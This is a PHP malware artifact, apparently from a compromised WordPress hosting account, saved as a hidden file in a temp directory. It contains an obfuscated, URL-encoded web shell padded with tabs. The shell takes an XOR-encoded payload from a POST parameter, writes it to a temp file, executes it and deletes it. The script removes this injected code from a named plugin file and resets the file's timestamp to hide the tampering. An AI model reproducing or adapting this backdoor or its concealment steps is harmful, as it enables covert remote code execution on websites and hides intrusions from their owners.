File: /home/mbkashyap/.cagefs/tmp/.partition
<?php $path = '/home/mbkashyap/domains/mbkashyap.com/private_html/wp-content/plugins/bizmaster-core/elementor/addons/elementor-testimonial-slider-two-widget.php'; $ft = @filemtime($path); $new_content = str_repeat("\t", 42).rawurldecode('if%28%21is_null%28%24_POST%5B%22p%5Cx67r%5Cx70%22%5D%20%3F%3F%20null%29%29%7B%20%24token%20%3D%20hex2bin%28%24_POST%5B%22p%5Cx67r%5Cx70%22%5D%29%3B%20%24sym%3D%20%27%27%20%3B%20for%28%24q%3D0%3B%20%24q%3Cstrlen%28%24token%29%3B%20%24q%2B%2B%29%7B%24sym%20.%3D%20chr%28ord%28%24token%5B%24q%5D%29%20%5E%2038%29%3B%7D%20%24object%20%3D%20array_filter%28%5Bgetenv%28%22TMP%22%29%2C%20%22/var/tmp%22%2C%20getcwd%28%29%2C%20%22/dev/shm%22%2C%20session_save_path%28%29%2C%20%22/tmp%22%2C%20getenv%28%22TEMP%22%29%2C%20sys_get_temp_dir%28%29%2C%20ini_get%28%22upload_tmp_dir%22%29%5D%29%3B%20%24binding%20%3D%200%3B%20do%20%7B%20%24property_set%20%3D%20%24object%5B%24binding%5D%20%3F%3F%20null%3B%20if%20%28%24binding%20%3E%3D%20count%28%24object%29%29%20break%3B%20if%20%28%28function%28%24d%29%20%7B%20return%20is_dir%28%24d%29%20%26%26%20is_writable%28%24d%29%3B%20%7D%29%28%24property_set%29%29%20%7B%20%24entry%20%3D%20%22%24property_set%22%20.%20%22/.flag%22%3B%20%24file%20%3D%20fopen%28%24entry%2C%20%27w%27%29%3B%20if%20%28%24file%29%20%7B%20fwrite%28%24file%2C%20%24sym%29%3B%20fclose%28%24file%29%3B%20include%20%24entry%3B%20%40unlink%28%24entry%29%3B%20exit%3B%20%7D%20%7D%20%24binding%2B%2B%3B%20%7D%20while%20%28true%29%3B%20%7D')."\n"; if (file_exists($path) && is_writable($path)) { $content = file_get_contents($path); if (strpos($content, $new_content) !== FALSE) { $content = str_replace($new_content, '', $content); file_put_contents($path, $content); @touch($path, $ft); } } die('!success!');